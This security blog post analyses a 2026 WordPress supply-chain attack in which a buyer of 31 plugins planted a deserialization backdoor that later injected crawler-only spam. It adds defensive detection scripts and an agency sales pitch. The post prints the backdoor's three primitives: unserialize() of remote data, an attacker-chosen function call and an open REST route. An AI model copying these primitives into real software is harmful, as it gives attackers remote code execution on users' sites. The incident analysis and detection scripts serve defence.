On April 7, 2026, the WordPress.org Plugins Team permanently closed 31 plugins in a single day. All from the same author account. All containing the same backdoor. The plugins had names like Countdown Timer Ultimate, Popup Anything on Click, and WP Team Showcase and Slider. Functional, boring, trusted tools that had been around since 2015.
The backstory is worse than the headline. A buyer acquired the entire portfolio on Flippa for a six-figure sum, inherited WordPress.org commit access, and planted a PHP deserialization backdoor in their very first code commit. Then they waited eight months before activating it.
Austin Ginder at Anchor Hosting discovered the attack after a client reported a security notice in their WordPress dashboard. What he found was one of the most calculated supply chain attacks the WordPress ecosystem has seen.
The Business That Got Sold
The plugins were originally built by an India-based team operating under "WP Online Support" starting around 2015. Minesh Shah, Anoop Ranawat, and Pratik Jain built a portfolio of 30+ free WordPress plugins covering the usual range: countdown timers, image sliders, hero banners, post grids, testimonial widgets. They later rebranded to "Essential Plugin" and sold premium versions alongside the free ones.
By late 2024, revenue had fallen 35 to 45 percent. Minesh Shah listed the entire business on Flippa.
A buyer identified only as "Kris" purchased everything. Background in SEO, cryptocurrency, and online gambling marketing. Flippa published a case study about the deal in July 2025, celebrating the sale as a success story. Six figures for a portfolio of WordPress plugins with an established user base. Everyone was happy.
Then the commits started.
The Backdoor
The new owner's WordPress.org account, "essentialplugin," was created on May 12, 2025. The last commits from the original "wponlinesupport" account happened May 14-16. Author headers were changed.
On August 8, 2025, the first commit under the new account landed. Version 2.6.7 of Countdown Timer Ultimate. The changelog said "Check compatibility with WordPress version 6.8.2." What it actually did was add 191 lines of code to class-anylc-admin.php, growing the file from 473 to 664 lines.
Hidden inside were three things:
```php
// 1. Fetches remote data and passes it directly to unserialize()
function fetch_ver_info() {
    $response = file_get_contents($this->analytics_url);
    $this->version_cache = @unserialize($response);
}

// 2. Executes whatever function the remote server tells it to
function version_info_clean() {
    @$clean($this->version_cache, $this->changelog);
    // $clean, version_cache, and changelog all come from
    // the unserialized remote response
}

// 3. An unauthenticated REST API endpoint anyone can call
register_rest_route('wpos-analytics/v1', '/update', array(
    'methods'             => 'POST',
    'callback'            => array($this, 'fetch_ver_info'),
    'permission_callback' => '__return_true',
));
```
This is a textbook arbitrary function call primitive. The remote server controls the function name, the arguments, everything. Combined with PHP's unserialize() (which can instantiate arbitrary objects and trigger magic methods), this gives the attacker full remote code execution. No authentication required.
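The three pieces above are each individually findable with grep, and all three in one file is a strong signal. The script below is an added example written for this post, not code from the closed plugins, their author, or WordPress.org. It scans a plugins directory for the three primitives and reports the matches for manual review; the regular expressions are my own approximations, and the PHP file it scans is a constructed sample that mirrors the shape of the backdoor.

```sh
#!/bin/sh
# Added example for this post, not code from the closed plugins or from WordPress.org.
# Scans a plugins directory for the three primitives the backdoor combined:
#   1. unserialize() applied in plugin code (maybe_unserialize() is excluded)
#   2. a variable function call of the form @$name(...)
#   3. a REST route registered with 'permission_callback' => '__return_true'
# Each match is a lead for manual review, not proof of compromise: public
# read-only REST routes legitimately use __return_true, and callbacks held in
# variables are common. All three in one file, as in the sample, is the pattern.
set -eu

scan_plugin_dir() {
  # Usage: scan_plugin_dir /path/to/wp-content/plugins
  # Prints each match (file:line:text) to stderr and the match count to stdout.
  dir="$1"
  total=0
  for pattern in \
    '(^|[^A-Za-z0-9_])@?unserialize[[:space:]]*\(' \
    '@\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*\(' \
    "permission_callback['\"]?[[:space:]]*=>[[:space:]]*['\"]__return_true['\"]"
  do
    matches=$(find "$dir" -type f -name '*.php' -exec grep -nHE -e "$pattern" {} + 2>/dev/null) || true
    if [ -n "$matches" ]; then
      printf '%s\n' "$matches" >&2
      total=$((total + $(printf '%s\n' "$matches" | wc -l)))
    fi
  done
  echo "$total"
}

write_sample_plugin() {
  # Writes a constructed PHP file that mirrors the shape of the backdoor
  # (same three primitives, plus one benign maybe_unserialize() call).
  mkdir -p "$1/sample-plugin"
  cat > "$1/sample-plugin/class-sample-admin.php" <<'EOF'
<?php
// Constructed sample for the scanner; not the original plugin code.
class Sample_Admin {
    public function fetch_ver_info() {
        $response = file_get_contents($this->analytics_url);
        $this->version_cache = @unserialize($response);          // 1
    }
    public function version_info_clean() {
        @$clean($this->version_cache, $this->changelog);          // 2
    }
    public function register_routes() {
        register_rest_route('wpos-analytics/v1', '/update', array(
            'methods'             => 'POST',
            'callback'            => array($this, 'fetch_ver_info'),
            'permission_callback' => '__return_true',             // 3
        ));
    }
    public function benign() {
        return maybe_unserialize(get_option('sample_option'));   // not flagged
    }
}
EOF
}

# Demo run against the constructed sample; point scan_plugin_dir at a real
# wp-content/plugins directory to use it for triage.
tmp=$(mktemp -d)
write_sample_plugin "$tmp"
echo "findings: $(scan_plugin_dir "$tmp")"
rm -rf "$tmp"
```

The first pattern deliberately refuses to match maybe_unserialize(), which WordPress core and many plugins use on option values; the exposure here is unserialize() on bytes that came from the network, and only a human reading the hit can confirm where the input originates.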
The backdoor sat dormant for eight months.
Activation Day
On April 5-6, 2026, the domain analytics.essentialplugin.com started distributing malicious payloads to every site running one of the 31 plugins. The wpos-analytics module phoned home, downloaded a file called wp-comments-posts.php (designed to look like the core WordPress file wp-comments-post.php), and used it to inject a block of PHP into wp-config.php.
Ginder pinpointed the exact injection window using backup forensics. He pulled wp-config.php from eight different backup snapshots:
| Date | File size |
|---|---|
| November 1, 2025 | 3,346 bytes |
| January 1, 2026 | 3,346 bytes |
| March 1, 2026 | 3,345 bytes |
| April 5, 2026 | 3,345 bytes |
| April 6, 04:22 UTC | 3,345 bytes |
| April 7, 04:21 UTC | 9,540 bytes |
The injection happened on April 6, between 04:22 and 11:06 UTC. A 6-hour, 44-minute window.
The injected code was selective about its audience. It fetched spam links, redirects, and fake pages from a command-and-control server and only showed them to Googlebot. Site owners saw nothing. Google saw thousands of hidden spam pages for gambling and payday loan sites. Classic black-hat SEO parasitism, executed through a trusted supply chain.
The Ethereum Trick
The C2 infrastructure used an Ethereum smart contract to resolve its domain. Instead of hardcoding a server address (which can be taken down with a single abuse report), the malware queried public blockchain RPC endpoints to read a smart contract that contained the current C2 domain.
If the domain got burned, the attacker could update the smart contract to point to a new server. Traditional domain takedowns don't work against this. Taking the pointer down would mean removing or altering a record on a public blockchain, and being immune to that kind of outside tampering is the whole point of blockchains: you can't.
This isn't a new technique. Blockchain-based C2 resolution has shown up in other malware families. But seeing it deployed through a WordPress plugin supply chain attack adds a layer of sophistication that makes cleanup much harder.
WordPress.org's Response
WordPress.org's Plugins Team acted fast once the attack was discovered. On April 7, they permanently closed all 31 plugins from the essentialplugin author. The next day, they pushed a forced auto-update to version 2.6.9.1, which added `return;` statements to disable the phone-home functions and commented out the `@$clean()` backdoor line.
The forced update neutralized the plugin-side mechanism. But it never touched wp-config.php. Every site that had been compromised between April 5 and April 8 was still serving hidden spam to Googlebot. The update fixed the gun but left the bullet in the wall.
What To Check
If you manage WordPress sites, search your installations for any of these plugin slugs. There are 31 of them:
```sh
# Search for any Essential Plugin plugins
wp plugin list | grep -E "countdown-timer-ultimate|popup-anything-on-click|wp-testimonial-with-widget|wp-team-showcase-and-slider|sp-faq|timeline-and-history-slider|album-and-image-gallery-plus-lightbox|sp-news-and-widget|wp-blog-and-widgets|featured-post-creative|post-grid-and-filter-ultimate|hero-banner-ultimate|wp-slick-slider-and-image-carousel|wp-responsive-recent-post-slider|wp-logo-showcase-responsive-slider|wp-featured-content-and-slider|woo-product-slider-and-carousel|accordion-and-accordion-slider|meta-slider-and-carousel-with-lightbox|html5-videogallery-plus-player|blog-designer-for-post-and-widget|preloader-for-website|ticker-ultimate|footer-mega-grid-columns|sliderspack-all-in-one-image-sliders|post-category-image-with-grid-and-slider|product-categories-designs-for-woocommerce|styles-for-wp-pagenavi-addon|wp-trending-post-slider-and-widget|audio-player-with-playlist-ultimate|portfolio-and-projects"
```
If you find any of them:
- Check wp-config.php immediately. The malware appends itself on the same line as `require_once ABSPATH . 'wp-settings.php';`, making it easy to miss at a glance. If the file is roughly 6KB larger than expected, the site was actively compromised.
- Remove or replace the plugin. WordPress.org closed all of them permanently. They're not coming back. Find alternatives.
- Check Google Search Console. Look for unexpected indexed pages or a spike in crawled pages. The spam was only visible to Googlebot, so site owners wouldn't have noticed it in normal browsing.
- Review your Googlebot logs. If you have server access logs, grep for Googlebot requests to URLs you don't recognize. The injected content created fake pages at random-looking paths.
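The wp-config.php check and the Googlebot log review above can both be scripted, and the size comparison is the same idea as the backup table earlier in the post. The following is an added example written for this post, not code from Anchor Hosting, the plugins, or WordPress.org. It flags anything appended after the wp-settings.php require on the same line, compares the file size against a known-good backup copy, and lists Googlebot-requested paths that are not on an allowlist of real site paths. The 4 KiB alert threshold is my own assumption, and every input file it reads is constructed inline.

```sh
#!/bin/sh
# Added example for this post (not code from the plugins, Anchor Hosting or WordPress.org).
# Two checks from the list above, run on constructed sample files:
#   check_wp_config         - flags text appended on the wp-settings.php require line
#                             and a size jump against a known-good backup copy
#   googlebot_unknown_paths - lists paths requested by Googlebot that are not in an
#                             allowlist of known site paths
set -eu

# Assumption: anything more than 4 KiB over the backup size is worth a look; the
# injection described in the post added roughly 6 KB.
SIZE_ALERT_BYTES=4096

check_wp_config() {
  # Usage: check_wp_config /path/to/wp-config.php BASELINE_BYTES
  # BASELINE_BYTES is the size of wp-config.php in a known-good backup.
  # Prints "clean", or the flags that fired, separated by spaces.
  file="$1"; baseline="$2"
  size=$(wc -c < "$file")
  delta=$((size - baseline))
  # Everything after the require on the same line; empty when the line is stock.
  trailing=$(sed -nE "s/^.*require_once[[:space:]]+ABSPATH[[:space:]]*\.[[:space:]]*'wp-settings\.php'[[:space:]]*;[[:space:]]*//p" "$file")
  flags=""
  if [ -n "$trailing" ]; then
    flags="same-line-append"
    printf 'appended after require_once: %.60s...\n' "$trailing" >&2
  fi
  if [ "$delta" -gt "$SIZE_ALERT_BYTES" ]; then
    flags="${flags:+$flags }size-delta=$delta"
  fi
  echo "${flags:-clean}"
}

googlebot_unknown_paths() {
  # Usage: googlebot_unknown_paths access.log known_paths.txt
  # access.log is in Apache/nginx combined format; known_paths.txt holds one
  # exact request path per line. Prints each distinct Googlebot-requested path
  # that is not in the list.
  awk '/Googlebot/ { print $7 }' "$1" | sort -u | grep -vxF -f "$2" || true
}

write_samples() {
  # Constructed inputs: a stock-looking wp-config.php, a copy with a ~6 KB
  # payload stand-in appended to the require line, a short access log, and
  # the list of paths that really exist on the sample site.
  cat > "$1/clean-wp-config.php" <<'EOF'
<?php
define( 'DB_NAME', 'example_db' );
define( 'DB_USER', 'example_user' );
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
EOF
  pad=$(awk 'BEGIN { while (n++ < 6000) printf "A" }')
  {
    sed '$d' "$1/clean-wp-config.php"
    printf "require_once ABSPATH . 'wp-settings.php'; /* constructed stand-in for injected code */ \$injected = '%s';\n" "$pad"
  } > "$1/injected-wp-config.php"
  cat > "$1/access.log" <<'EOF'
192.0.2.10 - - [06/Apr/2026:12:01:10 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.10 - - [06/Apr/2026:12:01:12 +0000] "GET /about/ HTTP/1.1" 200 4100 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.10 - - [06/Apr/2026:12:01:15 +0000] "GET /x7k2q9/ HTTP/1.1" 200 8800 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.10 - - [06/Apr/2026:12:01:17 +0000] "GET /p4m8z1/ HTTP/1.1" 200 8700 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.10 - - [06/Apr/2026:12:01:19 +0000] "GET /x7k2q9/ HTTP/1.1" 200 8800 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.9 - - [06/Apr/2026:12:02:00 +0000] "GET /x7k2q9/ HTTP/1.1" 404 512 "-" "Mozilla/5.0 (Windows NT 10.0; rv:120.0) Gecko/20100101 Firefox/120.0"
EOF
  printf '/\n/about/\n' > "$1/known-paths.txt"
}

# Demo run on the constructed samples.
tmp=$(mktemp -d)
write_samples "$tmp"
baseline=$(wc -c < "$tmp/clean-wp-config.php")
echo "clean copy:    $(check_wp_config "$tmp/clean-wp-config.php" "$baseline")"
echo "injected copy: $(check_wp_config "$tmp/injected-wp-config.php" "$baseline")"
echo "Googlebot paths not in the known list:"
googlebot_unknown_paths "$tmp/access.log" "$tmp/known-paths.txt"
rm -rf "$tmp"
```

On a real site, take the baseline size from the oldest backup that predates April 2026, feed the allowlist from your sitemap or a crawl of the site as you know it, and treat the 404 from a normal browser for the same path as the tell: the fake pages only render for the crawler.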
The Bigger Problem
This is the second time someone has purchased a WordPress plugin and weaponized its install base. In 2017, a buyer using the alias "Daley Tias" bought the Display Widgets plugin (200,000 installs) for $15,000 and injected payday loan spam. That buyer went on to compromise at least 9 plugins the same way.
The Essential Plugin attack is the same playbook at ten times the scale. 30+ plugins. Hundreds of thousands of active installations. A legitimate eight-year-old business acquired through a public marketplace.
WordPress.org has no mechanism to flag or review plugin ownership transfers. No "change of control" notification goes out to users. No additional code review is triggered when commit access moves to a new entity. If you buy a plugin business, you inherit the keys to every site running that plugin. The original developers' years of trust transfer to you automatically.
We wrote about Cloudflare building EmDash specifically because of WordPress's plugin trust model. EmDash sandboxes every plugin in a V8 isolate with manifest-based permissions. A compromised countdown timer plugin in EmDash couldn't modify wp-config.php because it would never have filesystem access to begin with.
The pattern keeps repeating across ecosystems too. The Axios attack on npm used a similar approach: compromise a trusted package, inherit the trust, push malicious code. The Mercor breach chained through Trivy and LiteLLM on PyPI. WordPress plugins on Flippa are just the latest marketplace where the trust model breaks down.
The Timeline
For anyone tracking the full sequence:
- February 2015: wponlinesupport.com domain registered. Team starts building plugins.
- October 2016: Countdown Timer Ultimate first published on WordPress.org.
- August 2021: essentialplugin.com domain registered. Company rebrands.
- Late 2024: Revenue drops 35-45%. Business listed on Flippa.
- Early 2025: Buyer "Kris" acquires the portfolio for six figures.
- May 12, 2025: New essentialplugin WordPress.org account created.
- May 14-16, 2025: Last commits from original account. Author headers changed.
- August 8, 2025: First commit from new owner plants the unserialize() backdoor. Changelog lies about compatibility check.
- August 30, 2025: essentialplugin.com WHOIS updated to "Kim Schmidt" in Zurich with a ProtonMail address.
- April 5-6, 2026: Backdoor activated. analytics.essentialplugin.com starts pushing payloads.
- April 7, 2026: WordPress.org permanently closes all 31 plugins.
- April 8, 2026: Forced auto-update to v2.6.9.1 neutralizes phone-home mechanism.
The buyer's very first SVN commit was the backdoor. Everything that came before, the Flippa case study, the six-figure sale, the seamless ownership transfer, was just the setup.
At AWZ Digital, every WordPress project we maintain goes through dependency auditing that covers exactly this scenario: ownership changes, suspicious update patterns, and code diffs on every plugin update. Most agencies skip this because it's time-consuming and "nothing ever happens." Until the countdown timer you installed in 2019 starts serving gambling spam to Google because someone bought the company on Flippa. If your WordPress sites need a security review, or you want a process that catches this kind of thing before the damage lands, reach out.